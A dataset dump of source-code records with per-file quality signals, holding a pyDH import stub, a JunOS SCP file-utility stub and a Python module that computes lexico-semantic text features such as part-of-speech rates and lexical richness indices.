Dataset schema:

| field | type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| effective | string |
| hits | int64 |

Between `alphanum_fraction` and `effective` come 41 quality signals, each present twice and in the same order both times: first as `qsc_<name>_quality_signal` (float64, except `qsc_code_num_words_quality_signal`, which is int64, and `qsc_codepython_cate_var_zero_quality_signal`, which is bool), then as a bare `qsc_<name>` flag column (int64, except `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`, which are null in every row). The signal names, with the `qsc_` prefix dropped, are:

`code_num_words`, `code_num_chars`, `code_mean_word_length`, `code_frac_words_unique`, `code_frac_chars_top_2grams`, `code_frac_chars_top_3grams`, `code_frac_chars_top_4grams`, `code_frac_chars_dupe_5grams` through `code_frac_chars_dupe_10grams`, `code_frac_chars_replacement_symbols`, `code_frac_chars_digital`, `code_frac_chars_whitespace`, `code_size_file_byte`, `code_num_lines`, `code_num_chars_line_max`, `code_num_chars_line_mean`, `code_frac_chars_alphabet`, `code_frac_chars_comments`, `code_cate_xml_start`, `code_frac_lines_dupe_lines`, `code_cate_autogen`, `code_frac_lines_long_string`, `code_frac_chars_string_length`, `code_frac_chars_long_word_length`, `code_frac_lines_string_concat`, `code_cate_encoded_data`, `code_frac_chars_hex_words`, `code_frac_lines_prompt_comments`, `code_frac_lines_assert`, `codepython_cate_ast`, `codepython_frac_lines_func_ratio`, `codepython_cate_var_zero`, `codepython_frac_lines_pass`, `codepython_frac_lines_import`, `codepython_frac_lines_simplefunc`, `codepython_score_lines_no_logic`, `codepython_frac_lines_print`.

The records below use these base names; "signals" refers to the `_quality_signal` columns and "flags" to the bare columns.
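In the records below the bare flag columns only ever take 0 or 1 (or null for the two always-null fields), which suggests they are pass/fail indicators for the corresponding quality signal. A minimal sketch of filtering on them with pandas, assuming the dump has been saved to a Parquet file (the file name is hypothetical):

```python
import pandas as pd

# Hypothetical dump of the records below; any Parquet file with this schema works.
df = pd.read_parquet("code_quality_signals.parquet")

# Drop files that tripped any duplicate-n-gram flag (5-grams through 10-grams).
dupe_flags = [f"qsc_code_frac_chars_dupe_{n}grams" for n in range(5, 11)]
clean = df[(df[dupe_flags] == 0).all(axis=1)]
print(f"{len(clean)} of {len(df)} rows pass the duplicate-n-gram checks")
```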
**Record 1**

- hexsha: `ed68bd1d8d450093d1f9de39e63d07c64d8b318e` · size: 32 · ext: py · lang: Python
- max_stars: `pyDHFixed/__init__.py` in `pmichalak-l4a/pyDH` @ `6926e240daab294fc8c72110df5fe4ae16652eb4`, licenses ["Apache-2.0"], count 30, events 2017-03-29T14:02:26.000Z to 2021-12-31T17:36:17.000Z
- max_issues: same path, repo, and head, licenses ["Apache-2.0"], count 20, events 2021-05-03T18:02:23.000Z to 2022-03-12T12:01:04.000Z
- max_forks: `Lib/site-packages/pyDH/__init__.py` in `fochoao/cpython` @ `3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9`, licenses ["bzip2-1.0.6", "0BSD"], count 14, events 2017-10-25T07:06:12.000Z to 2021-11-01T17:38:54.000Z
- content:

```python
from .pyDH import DiffieHellman
```

- stats: avg_line_length 16, max_line_length 31, alphanum_fraction 0.84375
- signals: num_words 4, num_chars 32, mean_word_length 6.75, frac_words_unique 1, frac_chars_whitespace 0.125, size_file_byte 32, num_lines 1, num_chars_line_max 32, num_chars_line_mean 32, frac_chars_alphabet 0.964286, codepython_cate_ast 1, codepython_cate_var_zero true, codepython_frac_lines_import 1, codepython_score_lines_no_logic 1; all other signals 0
- flags set: num_words, num_chars, num_lines, codepython_cate_var_zero, codepython_frac_lines_import, codepython_score_lines_no_logic; frac_words_unique and frac_lines_string_concat null; all other flags 0
- effective: 0 · hits: 6
**Record 2**

- hexsha: `ed75289ff4e6874e3e61a06e2f69dca5cddc43ae` · size: 156 · ext: py · lang: Python
- max_stars: `pkgs/filetransferutils-pkg/src/genie/libs/filetransferutils/plugins/junos/scp/fileutils.py` in `jbronikowski/genielibs` @ `200a34e5fe4838a27b5a80d5973651b2e34ccafb`, licenses ["Apache-2.0"], count 94, events 2018-04-30T20:29:15.000Z to 2022-03-29T13:40:31.000Z
- max_issues: same path, repo, and head, licenses ["Apache-2.0"], count 67, events 2018-12-06T21:08:09.000Z to 2022-03-29T18:00:46.000Z
- max_forks: same path, repo, and head, licenses ["Apache-2.0"], count 49, events 2018-06-29T18:59:03.000Z to 2022-03-10T02:07:59.000Z
- content:

```python
""" File utils base class for SCP on JunOS devices. """
from ..fileutils import FileUtils as FileUtilsJunOSBase


class FileUtils(FileUtilsJunOSBase):
    pass
```

- stats: avg_line_length 26, max_line_length 55, alphanum_fraction 0.782051
- signals: num_words 19, num_chars 156, mean_word_length 6.421053, frac_words_unique 0.789474, frac_chars_whitespace 0.141026, size_file_byte 156, num_lines 6, num_chars_line_max 56, num_chars_line_mean 26, frac_chars_alphabet 0.910448, frac_chars_comments 0.301282, codepython_cate_ast 1, codepython_cate_var_zero true, codepython_frac_lines_pass 0.333333, codepython_frac_lines_import 0.333333, codepython_score_lines_no_logic 0.666667; all other signals 0
- flags set: num_words, num_lines, codepython_cate_var_zero, codepython_frac_lines_pass, codepython_frac_lines_import, codepython_score_lines_no_logic; frac_words_unique and frac_lines_string_concat null; all other flags 0
- effective: 0 · hits: 6
**Record 3**

- hexsha: `ed8be47d4b301f7d9de447873fd3b76e4a4e7444` · size: 30618 · ext: py · lang: Python
- max_stars: `features/text_features/helpers/blabla/blabla/sentence_aggregators/lexico_semantic_fearture_aggregator.py` in `jim-schwoebel/allie` @ `d85db041b91c81dfb3fd1a4d719b5aaaf3b6697e`, licenses ["Apache-2.0"], count 87, events 2020-08-07T09:05:11.000Z to 2022-01-24T00:48:22.000Z
- max_issues: same path, repo, and head, licenses ["Apache-2.0"], count 87, events 2020-08-07T19:12:10.000Z to 2022-02-08T14:46:34.000Z
- max_forks: same path, repo, and head, licenses ["Apache-2.0"], count 25, events 2020-08-07T20:03:08.000Z to 2022-03-16T07:33:25.000Z
- content:

```python
from blabla.sentence_processor.lexico_semantic_feature_engine import num_demonstratives
from blabla.utils.global_params import *
from collections import Counter
import numpy as np
import math
import blabla.utils.settings as settings


class Adjective_Rate(object):
    """Class to calculate the adjective rate
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the adjective rate
        Args:
            None
        Returns:
            The total number of adjectives to the total number of words
        """
        tot_num_adjs, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
            tot_num_words += so.num_words()
        return tot_num_adjs / tot_num_words


class Adposition_Rate(object):
    """Class to calculate the adposition rate
    Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the adposition rate
        Args:
            None
        Returns:
            The total number of adpositions to the total number of words
        """
        tot_num_nouns, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
            tot_num_words += so.num_words()
        return tot_num_nouns / tot_num_words


class Adverb_Rate(object):
    """Class to calculate the adverb rate
    Ref: https://www.cs.toronto.edu/~kfraser/Fraser15-JAD.pdf
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the adverb rate
        Args:
            None
        Returns:
            The total number of adverbs to the total number of words
        """
        tot_num_advs, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
            tot_num_words += so.num_words()
        return tot_num_advs / tot_num_words


class Auxiliary_Rate(object):
    """Class to calculate the auxiliary rate
    Ref: https://www.cs.toronto.edu/~kfraser/Fraser15-JAD.pdf
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the auxiliary rate
        Args:
            None
        Returns:
            The total number of auxiliaries to the total number of words
        """
        tot_num_advs, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_advs += so.pos_tag_counter.get_pos_tag_count(AUXILIARY)
            tot_num_words += so.num_words()
        return tot_num_advs / tot_num_words


class Conjunction_Rate(object):
    """Class to calculate the conjunction rate
    Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the conjunction rate
        Args:
            None
        Returns:
            The total number of conjunctions to the total number of words
        """
        tot_num_cconj, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
            tot_num_words += so.num_words()
        return tot_num_cconj / tot_num_words


class Determiner_Rate(object):
    """Class to calculate the determiner rate
    Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the determiner rate
        Args:
            None
        Returns:
            The total number of determiners to the total number of words
        """
        tot_num_cconj, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(DETERMINER)
            tot_num_words += so.num_words()
        return tot_num_cconj / tot_num_words


class Interjection_Rate(object):
    """Class to calculate the interjection rate
    Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the interjection rate
        Args:
            None
        Returns:
            The total number of interjections to the total number of words
        """
        tot_num_cconj, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(INTERJECTION)
            tot_num_words += so.num_words()
        return tot_num_cconj / tot_num_words


class Noun_Rate(object):
    """Class to calculate the noun rate
    Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the noun rate
        Args:
            None
        Returns:
            The total number of nouns to the total number of words
        """
        tot_num_nouns, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
            tot_num_words += so.num_words()
        return tot_num_nouns / tot_num_words


class Numeral_Rate(object):
    """Class to calculate the numeral rate
    Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the numeral rate
        Args:
            None
        Returns:
            The total number of numerals to the total number of words
        """
        tot_num_cconj, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(NUMERAL)
            tot_num_words += so.num_words()
        return tot_num_cconj / tot_num_words


class Particle_Rate(object):
    """Class to calculate the particle rate
    Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the particle rate
        Args:
            None
        Returns:
            The total number of particles to the total number of words
        """
        tot_num_cconj, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(PARTICLE)
            tot_num_words += so.num_words()
        return tot_num_cconj / tot_num_words


class Pronoun_Rate(object):
    """Class to calculate the pronoun rate
    Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the pronoun rate
        Args:
            None
        Returns:
            The total number of pronouns to the total number of words
        """
        tot_num_pron, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
            tot_num_words += so.num_words()
        return tot_num_pron / tot_num_words


class Proper_Noun_Rate(object):
    """Class to calculate the proper noun rate
    Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the proper noun rate
        Args:
            None
        Returns:
            The total number of proper nouns to the total number of words
        """
        tot_num_pron, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PROPER_NOUN)
            tot_num_words += so.num_words()
        return tot_num_pron / tot_num_words


class Punctuation_Rate(object):
    """Class to calculate the punctuation rate
    Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the punctuation rate
        Args:
            None
        Returns:
            The total number of punctuation tokens to the total number of words
        """
        tot_num_pron, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PUNCTUATION)
            tot_num_words += so.num_words()
        return tot_num_pron / tot_num_words


class Subordinating_Conjunction_Rate(object):
    """Class to calculate the subordinating conjunction rate
    Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the subordinating conjunction rate
        Args:
            None
        Returns:
            The total number of subordinating conjunctions to the total number of words
        """
        tot_num_pron, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_pron += so.pos_tag_counter.get_pos_tag_count(SUBORDINATING_CONJUNCTION)
            tot_num_words += so.num_words()
        return tot_num_pron / tot_num_words


class Symbol_Rate(object):
    """Class to calculate the symbol rate
    Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the symbol rate
        Args:
            None
        Returns:
            The total number of symbols to the total number of words
        """
        tot_num_pron, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_pron += so.pos_tag_counter.get_pos_tag_count(SYMBOL)
            tot_num_words += so.num_words()
        return tot_num_pron / tot_num_words


class Verb_Rate(object):
    """Class to calculate the verb rate
    Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the verb rate
        Args:
            None
        Returns:
            The total number of verbs to the total number of words
        """
        tot_num_verbs, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
            tot_num_words += so.num_words()
        return tot_num_verbs / tot_num_words


class Demonstrative_Rate(object):
    """Class to calculate the demonstrative rate
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the demonstrative rate
        Args:
            None
        Returns:
            The total number of demonstratives to the total number of words
        """
        tot_num_demons, tot_num_words = 0, 0
        for so in self.sentence_objs:
            tot_num_demons += num_demonstratives(so.stanza_doc)
            tot_num_words += so.num_words()
        return tot_num_demons / tot_num_words


class Possessive_Rate(object):
    """Class to calculate the possessive rate
    Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3642700/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the possessive rate
        Args:
            None
        Returns:
            The total number of adjectives and pronouns to the total number of words
        """
        tot_num_adjs, tot_num_pron, tot_num_words = 0, 0, 0
        for so in self.sentence_objs:
            tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
            tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
            tot_num_words += so.num_words()
        return (tot_num_adjs + tot_num_pron) / tot_num_words


class Noun_Verb_Ratio(object):
    """Class to calculate the ratio of the number of nouns to the number of verbs
    Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the noun to verb ratio
        Args:
            None
        Returns:
            The total number of nouns to the number of verbs
        """
        tot_num_nouns, tot_num_verbs = 0, 0
        for so in self.sentence_objs:
            tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
            tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
        if tot_num_verbs != 0:
            return tot_num_nouns / tot_num_verbs
        return NOT_AVAILABLE


class Noun_Ratio(object):
    """Class to calculate the ratio of the number of nouns to the total number of nouns and verbs
    Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the noun ratio
        Args:
            None
        Returns:
            The total number of nouns to the total number of nouns and verbs
        """
        tot_num_nouns, tot_num_verbs = 0, 0
        for so in self.sentence_objs:
            tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
            tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
        if (tot_num_nouns + tot_num_verbs) != 0:
            return tot_num_nouns / (tot_num_nouns + tot_num_verbs)
        return NOT_AVAILABLE  # same fallback the sibling ratio features use


class Pronoun_Noun_Ratio(object):
    """Class to calculate the ratio of the number of pronouns to the total number of nouns
    Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the pronoun to noun ratio
        Args:
            None
        Returns:
            The ratio of the total number of pronouns to the number of nouns
        """
        tot_num_prons, tot_num_nouns = 0, 0
        for so in self.sentence_objs:
            tot_num_prons += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
            tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
        if tot_num_nouns != 0:
            return tot_num_prons / tot_num_nouns
        return NOT_AVAILABLE


class Total_Dependency_Distance(object):
    """Class to calculate the sum of dependency distances
    Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the total dependency distance across all sentences
        Args:
            None
        Returns:
            the sum of dependency distances
        """
        tot_dist = 0
        for so in self.sentence_objs:
            sd = so.stanza_doc.to_dict()[0]
            tot_dist += np.sum([abs(int(dep['id']) - dep['head']) for dep in sd])
        return tot_dist


class Average_Dependency_Distance(object):
    """Class to calculate the mean of the per-sentence dependency distances
    Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the average dependency distance across all sentences
        Args:
            None
        Returns:
            the mean of the per-sentence dependency distances
        """
        tot_dist = []
        for so in self.sentence_objs:
            sd = so.stanza_doc.to_dict()[0]
            tot_dist.append(sum([abs(int(dep['id']) - dep['head']) for dep in sd]))
        if tot_dist:
            return np.mean(tot_dist)
        return NOT_AVAILABLE


class Total_Dependencies(object):
    """Class to calculate the number of unique syntactic dependencies
    Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the total number of unique dependencies across sentences
        Args:
            None
        Returns:
            the total number of unique dependencies
        """
        deprels = []
        for so in self.sentence_objs:
            sd = so.stanza_doc.to_dict()[0]
            deprels.extend([dep['deprel'] for dep in sd])
        return len(set(deprels))


class Average_Dependencies(object):
    """Class to calculate the average number of unique syntactic dependencies
    Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the average number of unique dependencies across sentences
        Args:
            None
        Returns:
            the average number of unique dependencies
        """
        num_deprels = []
        for so in self.sentence_objs:
            sd = so.stanza_doc.to_dict()[0]
            deprels = set([dep['deprel'] for dep in sd])
            num_deprels.append(len(deprels))
        if num_deprels:
            return np.mean(num_deprels)
        return NOT_AVAILABLE


class Closed_Class_Word_Rate(object):
    """Class to calculate the proportion of closed class words
    Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the proportion of closed class words
        Args:
            None
        Returns:
            The ratio of the total number of determiners, prepositions, pronouns and conjunctions to the total number of words
        """
        tot_num_det, tot_num_prep, tot_num_pron, tot_num_cconj, tot_num_words = 0, 0, 0, 0, 0
        for so in self.sentence_objs:
            tot_num_det += so.pos_tag_counter.get_pos_tag_count(DETERMINER)
            tot_num_prep += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
            tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
            tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
            tot_num_words += so.num_words()
        return (
            tot_num_det + tot_num_prep + tot_num_pron + tot_num_cconj
        ) / tot_num_words


class Open_Class_Word_Rate(object):
    """Class to calculate the proportion of open class words
    Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the proportion of open class words
        Args:
            None
        Returns:
            The ratio of the total number of nouns, verbs, adjectives and adverbs to the total number of words
        """
        tot_num_nouns, tot_num_verbs, tot_num_adjs, tot_num_advs, tot_num_words = 0, 0, 0, 0, 0
        for so in self.sentence_objs:
            tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
            tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
            tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
            tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
            tot_num_words += so.num_words()
        return (
            tot_num_nouns + tot_num_verbs + tot_num_adjs + tot_num_advs
        ) / tot_num_words


class Content_Density(object):
    """Class to calculate the content density of words
    Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the content density of words
        Args:
            None
        Returns:
            The ratio of the total number of open class words to the total number of closed class words
        """
        tot_num_nouns, tot_num_verbs, tot_num_adjs, tot_num_advs = 0, 0, 0, 0
        tot_num_det, tot_num_prep, tot_num_pron, tot_num_cconj = 0, 0, 0, 0
        for so in self.sentence_objs:
            tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
            tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
            tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
            tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
        for so in self.sentence_objs:
            tot_num_det += so.pos_tag_counter.get_pos_tag_count(DETERMINER)
            tot_num_prep += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
            tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
            tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
        numerator = tot_num_nouns + tot_num_verbs + tot_num_adjs + tot_num_advs
        denominator = tot_num_det + tot_num_prep + tot_num_pron + tot_num_cconj
        if denominator == 0:
            return NOT_AVAILABLE
        return numerator / denominator


class Idea_Density(object):
    """Class to calculate the idea density of words
    Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the idea density of words
        Args:
            None
        Returns:
            The ratio of the total number of verbs, adjectives, adverbs, prepositions, conjunctions to the number of words
        """
        tot_num_verbs, tot_num_adjs, tot_num_advs, tot_num_preps, tot_num_cconjs, tot_num_words = 0, 0, 0, 0, 0, 0
        for so in self.sentence_objs:
            tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
            tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
            tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
            tot_num_preps += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
            tot_num_cconjs += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
            tot_num_words += so.num_words()
        return (
            tot_num_verbs + tot_num_adjs + tot_num_advs + tot_num_preps + tot_num_cconjs
        ) / tot_num_words


class Honore_Statistic(object):
    """Class to calculate Honoré's statistic
    Ref: https://www.aclweb.org/anthology/W16-1902.pdf
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate Honoré's statistic
        Args:
            None
        Returns:
            Honoré's statistic of the words
        """
        all_words = []
        num_unique_words_spoken, num_words_spoken_only_once = 0, 0
        for so in self.sentence_objs:
            all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
        num_unique_words_spoken = len(set(all_words))
        word_counts = dict(Counter(all_words))
        for key, val in word_counts.items():
            if val == 1:
                num_words_spoken_only_once += 1
        num_words = len(all_words)
        if (num_words_spoken_only_once == num_unique_words_spoken) or (num_unique_words_spoken == 0) or (num_words == 0):
            return NOT_AVAILABLE
        honore_statistic = (100 * math.log(num_words)) / (
            1 - (num_words_spoken_only_once) / (num_unique_words_spoken)
        )
        return honore_statistic


class Brunet_Index(object):
    """Class to calculate Brunet's index
    Ref: https://www.aclweb.org/anthology/W16-1902.pdf
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate Brunet's index
        Args:
            None
        Returns:
            Brunet's index of the words
        """
        num_unique_words_spoken = 0
        all_words = []
        for so in self.sentence_objs:
            all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
        num_unique_words_spoken = len(set(all_words))
        num_words = len(all_words)
        brunet_index = math.pow(num_words, math.pow(num_unique_words_spoken, -0.165))
        return brunet_index


class Type_Token_Ratio(object):
    """Class to calculate the type-token ratio
    Ref: https://www.tandfonline.com/doi/abs/10.1080/02687038.2017.1303441
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the type-token ratio
        Args:
            None
        Returns:
            The ratio of the number of word types to the number of words
        """
        all_words = []
        all_word_lemmas = []
        for so in self.sentence_objs:
            all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
            all_word_lemmas.extend(
                [word.lemma for word in so.stanza_doc.sentences[0].words]
            )
        num_word_types = len(set(all_word_lemmas))
        num_words = len(all_words)
        return num_word_types / num_words


class Word_Length(object):
    """Class to calculate the mean word length
    Ref: https://pubmed.ncbi.nlm.nih.gov/26484921/
    """

    def __init__(self, sentence_objs):
        """The init method to initialize with an array of sentence objects
        """
        self.sentence_objs = sentence_objs

    def handle(self):
        """Method to calculate the mean word length
        Args:
            None
        Returns:
            The mean length of the word across all sentences
        """
        all_words = []
        for so in self.sentence_objs:
            all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
        mean_word_length = np.mean([len(word) for word in all_words])
        return mean_word_length


def lexico_semantic_feature_processor(sentence_objs, feature, **kwArgs):
    """Returns the lexico-semantic feature across all the sentences depending on the type of feature requested
    Args:
        sentence_objs (list<Sentence>): a list of Sentence objects
        feature (str): a string name for the requested feature
    Returns:
        the feature value
    """
    nr = globals()[feature.title()](sentence_objs)
    return nr.handle()
```

- stats: avg_line_length 34.210056, max_line_length 130, alphanum_fraction 0.617839
